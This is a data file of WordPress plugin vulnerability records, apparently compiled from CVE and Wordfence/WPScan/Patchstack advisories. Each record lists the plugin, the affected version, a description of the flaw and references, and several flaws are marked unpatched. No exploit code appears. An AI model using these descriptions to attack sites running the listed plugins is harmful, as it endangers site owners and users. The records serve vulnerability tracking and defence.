{"CVE_ID":"CVE-2024-13447","slug":"wp-hotel-booking","versionImpact":"2.1.6","description":"The WP Hotel Booking plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the hotel_booking_load_order_user AJAX action in all versions up to, and including, 2.1.6. This makes it possible for authenticated attackers, with Subscriber-level access and above, to retrieve a list of registered user emails.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-hotel-booking\\\/trunk\\\/assets\\\/js\\\/admin\\\/admin.hotel-booking.js#L621\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-hotel-booking\\\/trunk\\\/assets\\\/js\\\/admin\\\/admin.hotel-booking.js#L621\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3225879\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3225879\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wp-hotel-booking\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wp-hotel-booking\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/bc883e7e-af82-47e1-a0c0-122e6abd6b52?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/bc883e7e-af82-47e1-a0c0-122e6abd6b52?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13114","slug":"wp-projects-portfolio","versionImpact":"3.0","description":"The WP Projects Portfolio with Client Testimonials WordPress plugin through 3.0 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/0cecda12-590a-42a6-b10b-e0efe7fb3a3a\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/0cecda12-590a-42a6-b10b-e0efe7fb3a3a\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-5703","slug":"stageshow","versionImpact":"10.0.3","description":"The StageShow plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018anchor\u2019 parameter in all versions up to, and including, 10.0.3 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/stageshow\\\/trunk\\\/include\\\/stageshowlib_salesplugin.php#L424\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/stageshow\\\/trunk\\\/include\\\/stageshowlib_salesplugin.php#L424\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/stageshow\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/stageshow\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6543b8ad-e3f3-43c7-93f9-23f7df07e391?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6543b8ad-e3f3-43c7-93f9-23f7df07e391?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-5391","slug":"wc-purchase-orders","versionImpact":"1.0.2","description":"The WooCommerce Purchase Orders plugin for WordPress is vulnerable to arbitrary file deletion due to insufficient file path validation in the delete_file() function in all versions up to, and including, 1.0.2. This makes it possible for authenticated attackers, with Subscriber-level access and above, to delete arbitrary files on the server, which can easily lead to remote code execution when the right file is deleted (such as wp-config.php).","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wc-purchase-orders\\\/trunk\\\/includes\\\/class-bbpo-purchase-orders.php#L151\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wc-purchase-orders\\\/trunk\\\/includes\\\/class-bbpo-purchase-orders.php#L151\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wc-purchase-orders\\\/trunk\\\/includes\\\/class-bbpo-purchase-orders-files.php#L148\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wc-purchase-orders\\\/trunk\\\/includes\\\/class-bbpo-purchase-orders-files.php#L148\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/05a27a34-b324-4968-937e-2c0d24175d2a?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/05a27a34-b324-4968-937e-2c0d24175d2a?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-1844","slug":"subscribe2","versionImpact":"10.40","description":"The Subscribe2 plugin for WordPress is vulnerable to unauthorized access to email functionality due to a missing capability check when sending test emails in versions up to, and including, 10.40. This makes it possible for author-level attackers to send emails with arbitrary content and attachments to site users.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/subscribe2\\\/trunk\\\/admin\\\/send-email.php#L12\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/subscribe2\\\/trunk\\\/admin\\\/send-email.php#L12\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c34ce601-5cf9-433f-bc9d-5c705eba6b08?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c34ce601-5cf9-433f-bc9d-5c705eba6b08?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2930676\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2930676\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-30876","slug":"daves-wordpress-live-search","versionImpact":"4.8.1","description":"Auth. (admin+) Stored Cross-Site Scripting (XSS) vulnerability in Dave Ross Dave's WordPress Live Search plugin <=\u00a04.8.1 versions.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/daves-wordpress-live-search\\\/wordpress-dave-s-wordpress-live-search-plugin-4-8-1-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/daves-wordpress-live-search\\\/wordpress-dave-s-wordpress-live-search-plugin-4-8-1-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1381","slug":"page-builder-sandwich","versionImpact":"5.1.0","description":"The Page Builder Sandwich \u2013 Front End WordPress Page Builder Plugin plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 5.1.0. This makes it possible for authenticated attackers, with subscriber access and higher, to extract sensitive user or configuration data.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8e98d92a-fe64-4591-972b-ed11542506b7?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8e98d92a-fe64-4591-972b-ed11542506b7?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/page-builder-sandwich\\\/trunk\\\/class-inspector.php#L90\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/page-builder-sandwich\\\/trunk\\\/class-inspector.php#L90\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6172","slug":"email-subscribers","versionImpact":"5.7.25","description":"The Email Subscribers by Icegram Express \u2013 Email Marketing, Newsletters, Automation for WordPress & WooCommerce plugin for WordPress is vulnerable to time-based SQL Injection via the db parameter in all versions up to, and including, 5.7.25 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/13629598-d45d-4ff5-aeb5-6ac881d25183?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/13629598-d45d-4ff5-aeb5-6ac881d25183?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/email-subscribers\\\/trunk\\\/lite\\\/includes\\\/db\\\/class-es-db-contacts.php#L834\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/email-subscribers\\\/trunk\\\/lite\\\/includes\\\/db\\\/class-es-db-contacts.php#L834\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3107964\\\/email-subscribers#file4\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3107964\\\/email-subscribers#file4\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/email-subscribers\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/email-subscribers\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3107964%40email-subscribers%2Ftrunk&old=3104864%40email-subscribers%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3107964%40email-subscribers%2Ftrunk&old=3104864%40email-subscribers%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-7134","slug":"wp-poll","versionImpact":"3.3.78","description":"The LiquidPoll \u2013 Polls, Surveys, NPS and Feedback Reviews plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018form_data\u2019 parameter in all versions up to, and including, 3.3.78 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3e62eba7-1ac9-4420-8692-58a169aa4330?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3e62eba7-1ac9-4420-8692-58a169aa4330?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wp-poll\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wp-poll\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-poll\\\/trunk\\\/includes\\\/classes\\\/class-hooks.php#L408\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-poll\\\/trunk\\\/includes\\\/classes\\\/class-hooks.php#L408\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-4533","slug":"limit-login-attempts-plus","versionImpact":"1.1.0","description":"The Limit Login Attempts Plus plugin for WordPress is vulnerable to IP Address Spoofing in versions up to, and including, 1.1.0. This is due to insufficient restrictions on where the IP Address information is being retrieved for request logging and login restrictions. Attackers can supply the X-Forwarded-For header with a different IP Address that will be logged and can be used to bypass settings that may have blocked out an IP address or country from logging in.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/aec7b59f-1c8a-4403-b33b-c119bd96ad9d?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/aec7b59f-1c8a-4403-b33b-c119bd96ad9d?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/limit-login-attempts-plus\\\/trunk\\\/core\\\/LimitLoginAttempts.php#L1043\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/limit-login-attempts-plus\\\/trunk\\\/core\\\/LimitLoginAttempts.php#L1043\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-50466","slug":"darkmysite","versionImpact":"1.2.8","description":"Cross-Site Request Forgery (CSRF) vulnerability in DarkMySite DarkMySite \u2013 Advanced Dark Mode Plugin for WordPress darkmysite allows Cross Site Request Forgery. This issue affects DarkMySite \u2013 Advanced Dark Mode Plugin for WordPress: from n\/a through 1.2.8.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/darkmysite\\\/wordpress-darkmysite-advanced-dark-mode-plugin-for-wordpress-plugin-1-2-8-cross-site-request-forgery-csrf-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/darkmysite\\\/wordpress-darkmysite-advanced-dark-mode-plugin-for-wordpress-plugin-1-2-8-cross-site-request-forgery-csrf-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-2580","slug":"bit-form","versionImpact":"2.18.3","description":"The Contact Form by Bit Form plugin for WordPress is vulnerable to Stored Cross-Site Scripting via SVG File uploads in all versions up to, and including, 2.18.3 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses the SVG file.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3271396\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3271396\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/bit-form\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/bit-form\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1f3b5d85-a8b0-43ac-b593-a61e20b9a4ca?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1f3b5d85-a8b0-43ac-b593-a61e20b9a4ca?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-5699","slug":"devformatter","versionImpact":"2015.0.2.1","description":"The Developer Formatter plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Custom CSS in all versions up to, and including, 2015.0.2.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level access, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/devformatter\\\/trunk\\\/devfmt_css.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/devformatter\\\/trunk\\\/devfmt_css.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/devformatter\\\/trunk\\\/devinterface.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/devformatter\\\/trunk\\\/devinterface.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/devformatter\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/devformatter\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/63192a95-778b-452b-9081-cf20dc7f7ec1?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/63192a95-778b-452b-9081-cf20dc7f7ec1?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-6742","slug":"sureforms","versionImpact":"1.7.3","description":"The SureForms \u2013 Drag and Drop Form Builder for WordPress plugin for WordPress is vulnerable to PHP Object Injection in all versions up to, and including, 1.7.3 via the use of file_exists() in the delete_entry_files() function without restriction on the path provided. This makes it possible for unauthenticated attackers to inject a PHP Object. No known POP chain is present in the vulnerable software, which means this vulnerability has no impact unless another plugin or theme containing a POP chain is installed on the site. If a POP chain is present via an additional plugin or theme installed on the target system, it may allow the attacker to perform actions like delete arbitrary files, retrieve sensitive data, or execute code depending on the POP chain present.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3319753%40sureforms&new=3319753%40sureforms&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3319753%40sureforms&new=3319753%40sureforms&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/sureforms\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/sureforms\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1de12d1c-5ac4-4f80-b33d-a689a6916ee0?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1de12d1c-5ac4-4f80-b33d-a689a6916ee0?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-4390","slug":"wp-private-content-plus","versionImpact":"3.6.2","description":"The WP Private Content Plus plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 3.6.2 via the 'validate_restrictions' function. This makes it possible for unauthenticated attackers to extract sensitive data including the content of restricted posts on archive and feed pages.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-private-content-plus\\\/trunk\\\/classes\\\/class-wppcp-private-posts-pages.php#L138\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-private-content-plus\\\/trunk\\\/classes\\\/class-wppcp-private-posts-pages.php#L138\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-private-content-plus\\\/trunk\\\/classes\\\/class-wppcp-private-posts-pages.php#L211\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-private-content-plus\\\/trunk\\\/classes\\\/class-wppcp-private-posts-pages.php#L211\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4c305546-1548-4b77-a484-d7c51d829792?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4c305546-1548-4b77-a484-d7c51d829792?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-3427","slug":"salon-booking-system","versionImpact":"8.4.6","description":"The Salon Booking System plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 8.4.6. This is due to missing or incorrect nonce validation on the 'save_customer' function. This makes it possible for unauthenticated attackers to change the admin role to customer or change the user meta to arbitrary values via a forged request, granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2931406%40salon-booking-system&new=2931406%40salon-booking-system&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2931406%40salon-booking-system&new=2931406%40salon-booking-system&sfp_email=&sfph_mail=\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/salon-booking-system\\\/trunk\\\/src\\\/SLN\\\/Admin\\\/Customers.php?rev=2779160#L68\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/salon-booking-system\\\/trunk\\\/src\\\/SLN\\\/Admin\\\/Customers.php?rev=2779160#L68\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/93875f19-d9b9-4e33-bba9-afc75cf26bf2?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/93875f19-d9b9-4e33-bba9-afc75cf26bf2?source=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-3244","slug":"comments-like-dislike","versionImpact":"1.1.9","description":"The Comments Like Dislike plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the restore_settings function called via an AJAX action in versions up to, and including, 1.1.9. This makes it possible for authenticated attackers with minimal permissions, such as a subscriber, to reset the plugin's settings. NOTE: After attempting to contact the developer with no response, and reporting this to the WordPress plugin's team 30 days ago we are disclosing this issue as it still is not updated.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/comments-like-dislike\\\/trunk\\\/inc\\\/classes\\\/cld-admin.php#L99\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/comments-like-dislike\\\/trunk\\\/inc\\\/classes\\\/cld-admin.php#L99\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/66019297-a8a8-4bbc-99db-4b47066f3e50?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/66019297-a8a8-4bbc-99db-4b47066f3e50?source=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5048","slug":"contact-form-builder","versionImpact":"1.0.72","description":"The WDContactFormBuilder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'Contact_Form_Builder' shortcode in versions up to, and including, 1.0.72 due to insufficient input sanitization and output escaping on 'id' user supplied attribute. This makes it possible for authenticated attackers with contributor level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7152253a-7bb8-4b5c-bffd-86e46df54b7e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7152253a-7bb8-4b5c-bffd-86e46df54b7e?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/contact-form-builder\\\/tags\\\/1.0.72\\\/frontend\\\/views\\\/CFMViewForm_maker.php#L102\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/contact-form-builder\\\/tags\\\/1.0.72\\\/frontend\\\/views\\\/CFMViewForm_maker.php#L102\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-6878","slug":"slick-social-share-buttons","versionImpact":"2.4.11","description":"The Slick Social Share Buttons plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'dcssb_ajax_update' function in versions up to, and including, 2.4.11. This makes it possible for authenticated attackers, with subscriber-level permissions or above to update the site options arbitrarily.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/79a5c01d-3867-4b1e-b0ba-9a802f0bed92?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/79a5c01d-3867-4b1e-b0ba-9a802f0bed92?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/slick-social-share-buttons\\\/tags\\\/2.4.11\\\/inc\\\/dcwp_admin.php#L49\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/slick-social-share-buttons\\\/tags\\\/2.4.11\\\/inc\\\/dcwp_admin.php#L49\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1285","slug":"page-builder-sandwich","versionImpact":"5.1.0","description":"The Page Builder Sandwich \u2013 Front End WordPress Page Builder Plugin plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'gambit_builder_save_content' function in all versions up to, and including, 5.1.0. This makes it possible for authenticated attackers, with subscriber access and above, to insert arbitrary content into existing posts.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/69d3d66c-5557-4fb4-8bd7-05d76d6b86ab?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/69d3d66c-5557-4fb4-8bd7-05d76d6b86ab?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/page-builder-sandwich\\\/tags\\\/5.1.0\\\/class-page-builder-sandwich.php#L958\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/page-builder-sandwich\\\/tags\\\/5.1.0\\\/class-page-builder-sandwich.php#L958\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-7090","slug":"lh-add-media-from-url","versionImpact":"1.23","description":"The LH Add Media From Url plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the \u2018lh_add_media_from_url-file_url\u2019 parameter in all versions up to, and including, 1.23 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b3461327-9195-48ed-b9c3-7b33198e9438?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b3461327-9195-48ed-b9c3-7b33198e9438?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/lh-add-media-from-url\\\/trunk\\\/lh-add-media-from-url.php#L173\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/lh-add-media-from-url\\\/trunk\\\/lh-add-media-from-url.php#L173\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/lh-add-media-from-url\\\/trunk\\\/partials\\\/upload.php#L6\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/lh-add-media-from-url\\\/trunk\\\/partials\\\/upload.php#L6\",\"refsource\":\"\",\"tags\":[]}]"}
